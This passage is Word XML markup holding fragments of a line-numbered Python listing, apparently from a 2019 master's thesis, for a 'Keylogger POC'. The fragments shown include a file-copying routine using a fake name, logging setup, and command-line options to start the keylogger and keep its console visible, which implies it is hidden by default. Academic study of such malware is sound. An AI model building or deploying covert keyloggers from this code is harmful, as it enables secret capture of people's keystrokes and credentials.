      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'rb'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>f_source</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1094" w:name="l747"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">747  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1094"/>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ake_name</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'wb'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">as </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>f_destination</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1095" w:name="l748"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">748  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1095"/>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write</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>f_source</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>read</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>())</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1096" w:name="l749"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">749  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1096"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>f_source</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7" w:name="l750"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">750  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1097"/>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8" w:name="l751"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">751  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1098"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">            </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">return </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>fake_name</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1099" w:name="l752"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">752  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="109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100" w:name="l753"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">753  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="110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 un ejecutable. No replica {}'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>format</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101" w:name="l754"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">754  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1101"/>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102" w:name="l755"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">755  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1102"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1103" w:name="l756"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">756  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1103"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1104" w:name="l757"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">757  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1104"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Return Logging Level</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1105" w:name="l758"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">758  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1105"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>set_logging_level</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>verbose_leve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06" w:name="l759"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">759  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1106"/>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07" w:name="l760"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">760  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1107"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s61"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>0</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 xml:space="preserve">,                </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># No logging, no print</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1108" w:name="l761"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">761  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1108"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s61"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>1</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CRITICAL</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1109" w:name="l762"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">762  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1109"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s61"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>2</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p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1110" w:name="l763"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">763  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1110"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s61"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>3</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WARNING</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1111" w:name="l764"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">764  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1111"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s61"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>4</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p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1112" w:name="l765"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">765  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1112"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s61"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>5</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DEBUG</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1113" w:name="l766"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">766  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1113"/>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14" w:name="l767"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">767  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1114"/>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verbose_level</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s3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w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1115" w:name="l768"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">768  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1115"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1116" w:name="l769"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">769  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1116"/>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1117" w:name="l770"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">770  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1117"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s01"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t># Parse command line parameters</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1118" w:name="l771"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">771  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1118"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">def </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>parse_param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19" w:name="l772"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">772  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1119"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">    </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">parser </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>argparse</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>ArgumentParser</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>description</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s2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r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1120" w:name="l773"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">773  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="1120"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">                                     </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s11"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>epilog</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s21"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'Keylogger POC for MCS TFM La Salle 2019 by Gabriel Marti.'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1121" w:name="l774"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">774  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="112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s'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'--star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1122" w:name="l775"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">775  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="112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pecify -s or --start to start Keylogger'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1123" w:name="l776"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">776  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="112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w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s41"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>'--nohid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24" w:name="l777"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">777  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="112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o Hide console. Only for Debug.'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00472EBD" w:rsidRPr="00D566BA" w:rsidRDefault="00472EBD">
      <w:pPr>
        <w:pStyle w:val="HTMLconformatoprevio"/>
        <w:divId w:val="901450420"/>
        <w:rPr>
          <w:sz w:val="12"/>
          <w:szCs w:val="12"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="1125" w:name="l778"/>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="ln1"/>
          <w:szCs w:val="12"/>
        </w:rPr>
        <w:t xml:space="preserve">778  </w:t>
      </w:r>
      <w:bookmarkEnd w:id="112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k'</w:t>
      </w:r>
      <w:r w:rsidRPr="00D566BA">
        <w:rPr>
          <w:rStyle w:val="s31"/>
          <w:szCs w:val="12"/>
        </w:rPr>
